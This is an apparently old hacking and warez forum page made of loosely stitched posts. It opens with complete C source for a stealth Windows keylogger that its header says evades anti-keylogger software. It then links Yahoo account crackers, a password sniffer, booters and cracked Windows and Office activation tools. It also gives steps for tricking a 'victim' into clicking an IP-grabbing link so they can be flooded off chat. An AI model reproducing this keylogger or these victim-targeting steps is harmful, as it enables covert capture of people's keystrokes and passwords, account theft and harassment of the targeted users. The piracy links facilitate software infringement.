Please Donate

 

Steath keylogger Scrypt

//**********************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: NULL
// Purpose: Hookless Keylogger
// Test PlatForm: Win 2K Pro And Server SP4
// Compiled On: LCC 3.0,May Compile On VC++ 6.0(Not Test Yet)
// Limitation: More Usage Of System Resource; May Not Work On Win9x
// Advantage: Hookless Technique Fools Anti-Keylogger Programs
//**********************************************************************

#include <windows.h>
#include <stdio.h>

// Some Global Variables

// Lower Case Key & Some Other Keys
char *LowerCase[]={
"b",
"e",
"[ESC]",
"[F1]",
"[F2]",
"[F3]",
"[F4]",
"[F5]",
"[F6]",
"[F7]",
"[F8]",
"[F9]",
"[F10]",
"[F11]",
"[F12]",
"`",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"0",
"-",
"=",
"[TAB]",
"q",
"w",
"e",
"r",
"t",
"y",
"u",
"i",
"o",
"p",
"[",
"]",
"a",
"s",
"d",
"f",
"g",
"h",
"j",
"k",
"l",
";",
"'",
"z",
"x",
"c",
"v",
"b",
"n",
"m",
",",
".",
"/",
"\\",
"[CTRL]",
"[WIN]",
" ",
"[WIN]",
"[Print Screen]",
"[Scroll Lock]",
"[Insert]",
"[Home]",
"[PageUp]",
"[Del]",
"[End]",
"[PageDown]",
"[left]",
"[UP]",
"[right]",
"[Down]",
"[Num Lock]",
"/",
"*",
"-",
"+",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
".",
};

// Upper Case Key & Some Other Keys
char *UpperCase[]={
"b",
"e",
"[ESC]",
"[F1]",
"[F2]",
"[F3]",
"[F4]",
"[F5]",
"[F6]",
"[F7]",
"[F8]",
"[F9]",
"[F10]",
"[F11]",
"[F12]",
"~",
"!",
"@",
"#",
"$",
"%",
"^",
"&",
"*",
"(",
")",
"_",
"+",
"[TAB]",
"Q",
"W",
"E",
"R",
"T",
"Y",
"U",
"I",
"O",
"P",
"{",
"}",
"A",
"S",
"D",
"F",
"G",
"H",
"J",
"K",
"L",
":",
"\"",
"Z",
"X",
"C",
"V",
"B",
"N",
"M",
"<",
">",
".?",
"|",
"[CTRL]",
"[WIN]",
" ",
"[WIN]",
"[Print Screen]",
"[Scroll Lock]",
"[Insert]",
"[Home]",
"[PageUp]",
"[Del]",
"[End]",
"[PageDown]",
"[left]",
"[Up]",
"[right]",
"[Down]",
"[Num Lock]",
"/",
"*",
"-",
"+",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
".",
};

// Ascii Keys,Forget About It
int SpecialKeys[]={
8,
13,
27,
112,
113,
114,
115,
116,
117,
118,
119,
120,
121,
122,
123,
192,
49,
50,
51,
52,
53,
54,
55,
56,
57,
48,
189,
187,
9,
81,
87,
69,
82,
84,
89,
85,
73,
79,
80,
219,
221,
65,
83,
68,
70,
71,
72,
74,
75,
76,
186,
222,
90,
88,
67,
86,
66,
78,
77,
188,
190,
191,
220,
17,
91,
32,
92,
44,
145,
45,
36,
33,
46,
35,
34,
37,
38,
39,
40,
144,
111,
106,
109,
107,
96,
97,
98,
99,
100,
101,
102,
103,
104,
105,
110,
};

HWND PreviousFocus=NULL;
// End Of Data

// Function ProtoType Declaration
//----------------------------------------------------------------------
BOOL IsWindowsFocusChange();
BOOL KeyLogger();
//----------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration

// Main Function
int main()
{
KeyLogger(); // Run The Keylogger
return 0; // The Program Quit
}
// End Of Main

//-------------------------------------------------------------------------
// Purpose: To Check The Active Windows Title
// Return Type: Boolean
// Parameters: NULL
//-------------------------------------------------------------------------
BOOL IsWindowsFocusChange()
{
HWND hFocus = GetForegroundWindow(); // Retrieve The Active Windows's Focus
BOOL ReturnFlag = FALSE; // Declare The Return Flag
if (hFocus != PreviousFocus) // The Active Windows Has Change
{
PreviousFocus = hFocus; // Save The Old Active Windos Focus
int WinLeng = GetWindowTextLength(hFocus); // Get The Active Windows's Caption's Length
char *WindowCaption = (char*) malloc(sizeof(char) * (WinLeng + 2)); // Allocate Memory For The Caption
GetWindowText(hFocus,WindowCaption,(WinLeng + 1)); // Retrieve The Active Windows's Caption
if (strlen(WindowCaption) > 0) // Really Get The Windows's Caption
{
printf("\r\nThe Active Windows Title: %s\r\n",WindowCaption); // Display The Active Windows's Caption
ReturnFlag=TRUE; // Indicate The Windows's Focus Has Changed
}
free(WindowCaption); // Free The Allocated Memory
}
return ReturnFlag; // Return The Flag
}// End Of IsWindowsFocusChange Function

//-------------------------------------------------------------------------
// Purpose: To Manage(Display)The Keys Retrieved From System's Key Buffer
// Return Type: Boolean
// Parameters: NULL
//-------------------------------------------------------------------------
BOOL KeyLogger()
{
int bKstate[256] = {0}; // Declare The Key State Array
int i,x;
char KeyBuffer[600]; // Key Buffer Array
int state; // Variable To Hode State Of Some Special Key Like CapsLock,Shift And ect
int shift; // Variable To Hode State Of Shift Key

// Reset The Buffer
memset(KeyBuffer,0,sizeof(KeyBuffer));

while(TRUE) // Forever Loop Is Taking Place Here
{
Sleep(8); // Rest For A While,And Avoid Taking 100% CPU Usage.Pretty Important To Add This Line Or The System Gets ****ed UP
if (IsWindowsFocusChange()) //Check The Active Windows Title
{
if (strlen(KeyBuffer) != 0) // Keys Are Pressed
{
printf("%s\r\n",KeyBuffer); // Display The Keys Pressed
memset(KeyBuffer,0,sizeof(KeyBuffer)); // reset The Buffer
}
}

for(i=0;i<92;i++) // Looping To Check Visual Keys
{
shift = GetKeyState(VK_SHIFT); // Check Whether Shift Is Pressed
x = SpecialKeys[i]; // Match The Key
if (GetAsyncKeyState(x) & 0x8000) // Check Combination Keys
{
// See Whether CapsLocak Or Shift Is Pressed
if (((GetKeyState(VK_CAPITAL) != 0) && (shift > -1) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Not Pressed
{
bKstate[x] = 1; //Uppercase Characters A-Z
}
else
if (((GetKeyState(VK_CAPITAL) != 0) && (shift < 0) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Pressed
{
bKstate[x] = 2; //Lowercase a-z
}
else
if (shift < 0) // Shift Is Pressed
{
bKstate[x] = 3; //Uppercase Characters A-Z
}
else
bKstate[x] = 4; //Lowercase a-z
}
else
{
if (bKstate[x] != 0) // No Combination Keys Detected
{
state = bKstate[x]; // Retrieve The Current State
bKstate[x] = 0; // Reset The Current State
if (x == 8) // Back Space Is Detected
{
KeyBuffer[strlen(KeyBuffer) - 1] = 0; // One Key Back Then
continue; // Start A New Loop
}
else
if (strlen(KeyBuffer) > 550) // Buffer FULL
{
printf("%s <Buffer Full>",KeyBuffer); // Display The Keys Retrieved
memset(KeyBuffer,0,sizeof(KeyBuffer)); // Reset The Buffer
continue; // Start A New Loop
}
else
if (x == 13) // Enter Is Detected
{
if (strlen(KeyBuffer) == 0) // No Other Keys Retrieved But Enter
{
continue; // Start A New Loop
}
printf("%s<Enter>\r\n",KeyBuffer); // Retrieve Other Keys With Enter
memset(KeyBuffer,0,sizeof(KeyBuffer)); // Display The Keys With Enter
continue; // Start A New Loop
}
else
if ((state%2) == 1) //Must Be Upper Case Characters
{
strcat(KeyBuffer,UpperCase[i]); // Store The Key To Key Buffer
}
else
if ((state%2) == 0) // Must Be Lower Case Characters
{
strcat(KeyBuffer,LowerCase[i]); // Store The Key To Key Buffer
}
}
}
}// End Of For Loop
}// End Of While Loop
return TRUE; // Return To The Caller
}// End Of KeyLogger Function
// End Of File

YAHOO CRACKER


VERY NICE CRACKER WITH FREE NICE SERVERS

note: please add more servers so it works more perfectly

I HAVE MANY HITZ FROM THIS CRACKER

SO MAKE IT PRIVATE


GL




http://www.virustotal.com/analisis/60248e5a247abfa752220933f4a07d65
http://www.sendspace.com/file/jplsmz

Lock-The-Homo v2 11/1072008 update by joker

Windows Dark Edition 6 2008


� All In One Driver
� RVMAddons 1.8.2
� RUPUpdates 2.1.11.13 Addon
� WScript57 1.0.0 Addon
� DriveSpace v4.1.0.17
� Kels CPLBonus addon v6.8
� Boooggy WMP11Addon
� Gorki AddOn QTAddressBar
� NR_CursorsAIO Addon 1.3
� Ricks StylerTB1401 AddOn
� Ricks ViStartBuild2502 AddOn_70906
� Ricks VistaRTMBootSceen KB940322
� Ricks WindowsSidebar
� Ricktendo64 RefreshClock addon
� ENG2ITA WINFLIP 0421
� VISTALOOKDE
� DirectX 9.0c Dec. 2007


http://rapidshare.com/files/81893035...by.reezwan.001
http://rapidshare.com/files/81963155...by.reezwan.002
http://rapidshare.com/files/81893043...by.reezwan.003
http://rapidshare.com/files/81918773...by.reezwan.004
http://rapidshare.com/files/81892992...by.reezwan.005
http://rapidshare.com/files/81892930...by.reezwan.006



Password: subforum.info

The World Browser 2.2.1.0[easy-share] 11\14\08


TheWorld Browser is a tiny, fast, yet free, secure and powerful web browser. It features multi-tabbed with multi-threaded frame browser. TheWorld Browser is compatible with Microsoft Internet Explorer. It is designed for Microsoft Windows OS, supports windows98/me/2000/xp/vista.

Key features of *TheWorld Browser*
* Multi-threaded frame.
* TheWorld Browser is the second multi-thread frame browser in the world(the first is Internet Explorer 7.0), the multi-threaded window frame can avoid web page being out of response.
* Intelligent Ad. blocking + Blacklist filter.
* TheWorld can block popup ad. and float ad. automatically.
* You can also use black list to filter ad., the black list filter is working from lower level of HTTP protocol, with regular expression, you can filter every page item that you want.
* Most powerfull function.
* Flash filter, unlock page script limited, zoom in/out page in all level, proxy quick switch, auto forms, quick media saver, privacy keeper, mouse gesture , custom hotkey, drag&drop link
* More safety.
* TheWorld Browser has special safe guard to keep you out of risk, more safe function is still in development
* A Download Tool.
* Which is insist multi-thread download, resumable download, with a easy download manager, it can save you most time.
* Skin and plugins.
* TheWorld Browser insist skin and plugins, now we had hundreds of skin and plugins to extend your browse experience, also, we insist Internet Explorers plugin.

Improvement:
Improve safe guard, when some attack start by Flash players security flaws, safe guard will alarm.
Fixed:
Fixed recent security issues of IE kernel browser control.
Fixed some compatibility bugs.


http://w17.easy-share.com/1701024475.html

Send Transfer Huge Big File in Yahoo Messenger

Send Transfer Huge Big File in Yahoo Messenger: Pando Plug in Transfer File Manager

If you wanna send a huge or big file tru Send File Transfer in Yahoo Messenger, you can use Pando Plug-in Transfer Manager. Pando can be used to pause, resume and continue the file transfer thru Yahoo Messenger just like Download manager. This great tool of Yahoo Messenger Plug-in File Transfer. If you face your sending file progress stop it in the middle of Transferring, you can simply resume the file transfer and without need to restart from beginning.


To install Pando Plug-n File Transfer Manager of Yahoo Messenger just visit http://gallery.yahoo.com/apps/315/locale/en]here. Click Install Now then continue the proses until warning message appear that new plug-in will added to your Yahoo messenger software. The Maximum size can handled by Pando is 1Gigabyte.

You have to understand that to send the big File size or huge file size using Pando, the receiver must also install Pando. Just Enter the email address or Yahoo Id when you want to send a file [After you click "Send Now" button]. Fill the packet package name then click Send. Enter security code and the file has been sent.

You can also drag and drop the huge file from windows explorer to Instant Message window using Pando. For short review about this Pando File Transfer Plug-in of Yahoo Messenger below is the list:

Send / Receive File or even Folder
Passing Through Firewall
Send multiple file and folder to multiple ID or username or email instantly
Stop Proses Transfer and Resume it Again.

May be we can calls Pando as Yahoo Messenger Transfer File Manager.

Get windows xp pro

Windows XP all OS

Ever want to boot up into Windows XP via a USB memory key?Well, now you can. This is a miniature version of Win XP - just enough to get your up and running so you can restore from backup, access your files, or do whatever you have to do.

Quote:
The LiveXP - README..txt file is in German which roughly translated reads:

"Installation guidance: start "LiveXP.bat" it starts a Installations script, in which the program must be given the SOURCE path (INSTALLDIR) and the destination drive. After a few minutes the stick is then finished."

You don't need to install the boot loader. It's done automatically during full installation.

Windows.XP.USB.Stick.Edition
60MB Compress
152MB UnCompress
No Pass
Ever want to boot up into Windows XP via a USB memory key?
Well, now you can.
This is a miniature version of Win XP
Just enough to get your up and running
so you can restore from backup,
access your files, or do whatever you have to do.
Also go to your BIOS setting and change the BOOT sequence. Removable drive or
something should be at the top then try to reboot your PC.
Installation guidance: start "LiveXP.bat" it starts a Installationsscript,
in which data must be given the SOURCE path (INSTADLLDIR) and the goal drive assembly.
After a few minutes the stick is then finished.

Get Room List

yahoo ID Cracker

http://www.4shared.com/get/54014615/32abaf99/ID_Cracker_v10.html;jsessionid=77B3F027B7FF23602E202C0343CE2AB9.dc82

Windows XP SP3 TCP/IP Patcher

http://rapidshare.com/files/142402256/tcpip-patcher-hwrms.rar.html

 This program is translated by me, it is originally a component of BitSpirit, a torrent download client. This crack is designed only for all versions of WIndows XP SP3.
By increasing the number of TCP/IP connections allowed at one time, your internet speeds up, especially when you are downloading stuff or playing online games. I recommend you to set the limitation to 500 to 600.
  Before applying the crack, remember to unplug internet connections and restart computer to make sure the TCP/IP file is not in use.


IP-Forcer-YTerror.net.zip

ACE PASSWORD SNIFFER BY hauns17

http://rapidshare.com/files/15490597...IFFER.exe.html
http://www.2shared.com/file/4110006/...P_SNIFFER.html

ACE PASSWORD SNIFFER
The effective password recovery utility brings you a brand-new way to get your forgotten password back. Network administrators or concerned parents can also use it to capture passwords of other users, but such action may be considered as invasion of privacy, and make sure you have the right to do so. Currently Ace Password Sniffer supports passwords monitoring through FTP, POP3, HTTP, SMTP, Telnet, including some web mail password.
Ace Password Sniffer works passively and don't generate any network traffic, therefore, it is very hard to be detected by others. And you needn't install any additional software on the target PCs or workstations. If your network is connected through switch, you can run the sniffer on the gateway or proxy server, which can get all network traffic.


locked 24 hours with manual lock

this my trik to locked some victim with 24 hours locked before i dc my victim...........

Windows-XP-USB-Stick-Edition-part1

http://www.getupload.org/file/5065/Windows-XP-USB-Stick-Edition-part1-rar.html

Copy this Text

Ever want to boot up into Windows XP via a USB memory key?Well, now you can. This is a miniature version of Win XP - just enough to get your up and running so you can restore from backup, access your files, or do whatever you have to do.

Quote:
The LiveXP - README..txt file is in German which roughly translated reads:

"Installation guidance: start "LiveXP.bat" it starts a Installations script, in which the program must be given the SOURCE path (INSTALLDIR) and the destination drive. After a few minutes the stick is then finished."

You don't need to install the boot loader. It's done automatically during full installation.

Windows.XP.USB.Stick.Edition
60MB Compress
152MB UnCompress
No Pass
Ever want to boot up into Windows XP via a USB memory key?
Well, now you can.
This is a miniature version of Win XP
Just enough to get your up and running
so you can restore from backup,
access your files, or do whatever you have to do.
Also go to your BIOS setting and change the BOOT sequence. Removable drive or
something should be at the top then try to reboot your PC.
Installation guidance: start "LiveXP.bat" it starts a Installationsscript,
in which data must be given the SOURCE path (INSTADLLDIR) and the goal drive assembly.
After a few minutes the stick is then finished.


Windows XP Permanent validation
well guys windows have delete de key that i use so all time wend i rebout i have the warning bla bla bla...so today i lose some time to find a clean good prog to resolve the problem...this is nouthing new but is better that many others....you have a tuto text file inside but also make a tuto with pictures to newbies...enjoy
1....... http://www.2shared.com/file/2165956/547092c6/Windows_XP_Permanent.html



2.......



3.......



4........



5........



6.........

Office 2003 Activation Hack

If you're searching for the Office 2003 Hack, you have come to the right place! If you're here looking for a way to crack Microsoft Office 2003 Product Registration, then you're in the wrong place (unless you're here to see if you're safe from hackers! Look to your left and test yourself).

We are simply providing instructions for the 2003 quick brown fox activation hack / Easter egg (type) which is in no way illegal. Office Hack for 2003 actually came from one of the coders said to be directly involved in creating office 2003.

Microsoft is aware of the Office 2003 hack and according to Serial-Crack (specializes in Activation Hacks such as these) states that 'This is by design and considered a product feature'. Rumor has it that this hack will also work on future versions of Microsoft Office.

Serial-Crack reported 'I thought I would get creative with the Activation Hack and changed a few numbers, I bumped the code to 2005,2006 and my system just stopped. It took me awhile, but I found that keeping the code at 200,99 worked great'

Fair warning here that running the Office 2003 Hack may slow down your system or your PC may become sluggish, but only during the activation process. Reports state that the 2003 Hack takes anywhere from a few seconds to two minutes depending on your processing speed.

To execute the Office 2003 Hack, and this works with earlier versions as well, simply enter the code
'= rand (200,99)'. See detailed hack code below.

Office 2003 Activation Hack Instructions

  • Open a blank Word document
  • Type =rand(200,99)
  • Press Enter
  • Wait for 30 seconds.

This Activation Hack will generate code / text and should complete within a few seconds. Serial-Crack refers to the code as the quick brown fox text.

Speaking of Hacks - Have you been hacked but don't know it? Copy this text into your clipboard:

Now follow the Anonymous Surfing link to see if you're giving away your personal information!

If you see your clipboard data displayed on the next screen, then any website can view your clipboard data! Not good depending on what you copy and paste!

Configuring Browser Proxy

ananamous 125.93.0:8080 New oct 17th

Internet Explorer


1. Open Internet Explorer

2. Click on Tools

3. Click on Internet Options

4. Click on Connections

5. Click on the LAN Settings

6. Make sure that the checkbox next to Use a proxy server for your LAN (These settings will not apply for dial-up or VPN Connections) is checked

7. Enter the Address as Proxy IP and Port as Proxy Port

8. Click the button Advanced. For HTTP, enter the proxy host name as Proxy IP and port as Proxy Port;. Check the check box "Use the same proxy for all protocols"

9. Click on OK button in the subsequent screens. This will set the proxy settings for IE.


Mozilla


1. Open Mozilla

2. Click on Edit->Preferences

3. In the list on the left, click on the arrow next to Advanced

4. Click on Proxies

5. Click on the radio button next to Manual Proxy Configuration

6. For HTTP, SSL, and FTP, enter the proxy host name as Proxy IP and port as Proxy Port

7. Click on OK button. This will set the proxy settings for Mozilla.


FireFox


1. Open FireFox

2. Click on Tools

3. Click on Options

4. Click on Connections Settings

5. Cick on the radio button next to Manual Proxy Configuration

6. For HTTP, enter the proxy host name as Proxy IP and port as Proxy Port. Check the check box "Use the same proxy for all protocols"

7. Click on OK button in the subsequent screens. This will set the proxy settings for FireFox.

Fix Your PC,,CC CEaner

Regester File Code

and here new way but i didnt if it work or not

Code:
First copy the following text into notepad and save as .reg file. 
Right-click the .reg file and select merge to add these keys to the registry.
You should then have Register and Unregister on your context menu whenever you right-click a dll file.

Code:

Windows Registry Editor Version 5.00 
[HKEY_CLASSES_ROOTdllfileShell]
[HKEY_CLASSES_ROOTdllfileShellRegister]
[HKEY_CLASSES_ROOTdllfileShellRegistercommand]
@="regsvr32.exe \"%1\""
[HKEY_CLASSES_ROOTdllfileShellUnRegister]
[HKEY_CLASSES_ROOTdllfileShellUnRegistercommand]
@="regsvr32.exe /u \"%1\""

SYSTEM MECHANIC PRO. TRIAL

http://www.iolo.com/system-mechanic/pro/download.aspx
SYSTEM MECHANIC PRO  "TRIAL" IS FULLY FUNCTIONAL FOR 30 DAYS
FANTASTIC TWEAKER.

SEND MESSAGE 7\31\08

SEND MESSAGE by firestone0704.zip
simple program to send a yahoo pm

YAHOO ID GENERATOR by Firestone0704. 7\18\08

Room Mover Exploit

kok=document.getElementsByTagName('textarea')[0];kok.value=kok.value.replace(/http/gi,"http" );kok.value=kok.value.replace(/www/gi,"www");kok.value=kok.value.repl ace(/com/gi,"com");void(0)

Dark_King_Creator_V2.1 July 4th 08

id@-Y7Mail-Y!.CN-BTMaker July 4th 08

HuntersVoiceKiller

HuntersVoiceKiller.zip
Use isp scanner or ip sniffer in yazak ,kill clients voice Don't get caughtusing it!!!!

Yahoo Booter ..AT YOUTUBE

Change your cable ip address Oct17th 08

  DHCP IP Forcer Pro.exe
Getng you service provider ip

Lions IP Sniffer v1

Lions IP Sniffer v1.03.zip
 bro when u open the tool its will say a message to kill ur self bc u dotn kno hwo to use it.......but its ok here is teh help

1. click on start snifing

2. u will get a link above that, copy taht link and give it to ur victim ( note: some smert ass will not click on it but ask them to click on it but its ur trick to make them click on it)

3. when they click on it one ip address will appear on grabbed ip option...(without the port of victims ip)

4. for not getting confused that which one is whos ip give the link each person and wait until their ip appear

5. enjoy with their ip .....(note: do what ever u need to do with their ip but if u want then u can use it to kill victim udp so they wont be able to talk on yahoo but using a udp killer or something like that

thanks but i hope after that pls dotn ask for any help just say thanks or something or ur coments bc its easy to sue and i gave all the step taht u need

Dll Ocx file downloads

Missing a DLL-File

Missing a DLL-File? Try finding it at afreeDLL.com

Welcome

Recent Forum Posts

by Booters haeven 9 months ago
More...